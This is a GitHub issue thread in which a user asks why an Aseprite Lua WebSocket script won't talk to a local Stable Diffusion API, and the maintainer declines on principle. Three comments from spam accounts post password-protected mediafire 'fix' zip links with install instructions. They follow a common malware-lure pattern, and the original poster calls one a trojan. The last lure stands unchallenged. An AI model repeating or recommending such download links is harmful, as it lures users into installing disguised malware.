### ISSUE TITLE
Websocket issue

### ISSUE THREAD

**Issue by VeteranXT** [aseprite/aseprite#4612]
I wrote code about 45 lines long 

```
local` ws = nil
local url_ = "http://127.0.0.1:7860/sdapi/v1/txt2img"
function init(plugin)
  -- Create a new dialog
  local dlg = Dialog("Send Data")
  -- Add a button to the dialog
  dlg:button{
    id = "send_button",
    text = "Senddddddddddddddd",
    onclick = function()
		if not ws then
			ws = WebSocket{
			url = "http://0.0.0.0:7860",
			onreceive = function(mt, data)
            if mt == WebSocketMessageType.PING then
				print("Connection open. Sending data...")
            elseif mt == WebSocketMessageType.TEXT then
				print("Message received: " .. data)
            elseif mt == WebSocketMessageType.CLOSE then
				print("Connection closed") 
			elseif mt == WebSocketMessageType.OPEN then
				ws:sendText("Hello, Aseprite!")
				print("Connection Eror")              
			end
		end,
			deflate = false
        }
    end
		-- Attempt to connect and send the data
      ws:connect()
	  ws = nil
    end
  }
  -- Show the dialog
  dlg:show{ wait = false }
end


function exit(plugin)

end
```
I'm making a stable diffusion sprite extension for asprite. 
tried using following adresses (post to txt2img ->http://127.0.0.1:7860/sdapi/v1/txt2img)
http://127.0.0.1:7860 
http://localhost:7860 
http://0.0.0.0:7860 
http://my own IP:7860  and with link to post aka http://127.0.0.1:7860/sdapi/v1/txt2img

Stable diffusion is running with --api and --listen flags so i can send them post to make me a picture. 

I just want to send "invalid HTTP request" to see if it works.

Wrote python script 
```
import requests
import base64

# Define the URL and the payload to send.
url = "http://127.0.0.1:7860"

payload = {
    "prompt": "japanese girl in a swimsuit on a beach in galaxy",
    "steps": 50
}
```

 Send said payload to said URL through the API.
response = requests.post(url=f'{url}/sdapi/v1/txt2img', json=payload)`
Works 100% of time while i can't get lua to work. 

So far nothing worked any suggestions are welcome.
...
...
...

### Aseprite and System version

* Aseprite version: version number, beta 1.3 steam version
* System: Windows 11, Ryzen 5 5600, RX 6600 XT, 32GB

**Comment by dacap** [comment]
> I'm making a stable diffusion sprite extension for asprite.

Sorry @VeteranXT, we're against generative AI models trained without artists consent, and stable diffusion is one of them. We cannot help you with this one. More info in: https://twitter.com/aseprite/status/1613125210844327937

**Comment by VeteranXT** [comment]
i trained my assets but i guess "Any" generative arts are forbidden,

**Comment by dacap** [comment]
You said that you are using stable diffusion, it is a pre-trained model with LAION databases. It doesn't matter if you trained the model a little more, the weights from where you start are pre-trained without the consent of hundreds of artists.

**Comment by VeteranXT** [comment]
Also its probably bigger bite that i can chew cuz i know little but i want to see why it wont talk to server. It just gives me errors ..

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by VeteranXT** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/6mkbh6xhau31g password: changeme when you installing, you need to place a check in install to path and select "gcc."

Nice try. Writhing a trojan horse really?

**Comment by dacap** [comment]
Just in case I blocked @ mabhi02 from Aseprite org.

**Comment by VeteranXT** [comment]
Thanks!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
